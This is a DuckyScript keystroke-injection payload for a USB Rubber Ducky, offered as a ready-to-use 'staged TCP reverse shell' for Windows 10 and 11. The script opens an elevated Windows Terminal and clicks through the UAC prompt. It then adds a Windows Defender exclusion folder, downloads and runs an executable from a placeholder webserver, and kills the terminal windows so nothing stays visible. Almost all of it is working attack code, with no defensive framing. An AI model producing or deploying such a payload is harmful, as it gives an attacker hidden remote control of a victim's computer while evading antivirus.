REM       |=========================================================================|
REM         Staged Interpreter TCP Reverse Ducky Shell
REM         Author: DVBNL
REM         Version 2.0
REM         OS Tested: Windows 11, Windows 10
REM         INTERPRETER STAGED REVERSE SHELL > executable
REM         WORKS WITH NEWEST WINDOWS TERMINAL (wt.exe)
REM         CHANGE >> LINE 23 - 28 VARIABLES + URL LINE 39
REM       |=========================================================================|


REM |===Start Windows Terminal as admin===|
DELAY 2000
GUI r
DELAY 250
STRING powershell "start-process wt -verb runas" 
ENTER
DELAY 2500
LEFT
ENTER
DELAY 1000

REM |===Import variables===|
STRING $dir = "C:\temp" 
ENTER
STRING $shell = "$dir\shell.exe" 
ENTER
DELAY 250

REM |===Add path exclusion to Windows Defender===|
STRING Add-MpPreference -ExclusionPath $dir
ENTER
DELAY 750

REM |===Download shell executable from Webserver===|
STRING Invoke-WebRequest -Uri http://yourwebserver/payload.exe -OutFile $shell
ENTER
DELAY 750

REM |===Run .exe and set up Staged TCP reverse shell===|
STRING Start-Process $shell
ENTER
DELAY 750

REM |===Kill all active wt or powershell processes (Visibility)===|
STRING Stop-Process -Name powershell, WindowsTerminal
ENTER
DELAY 500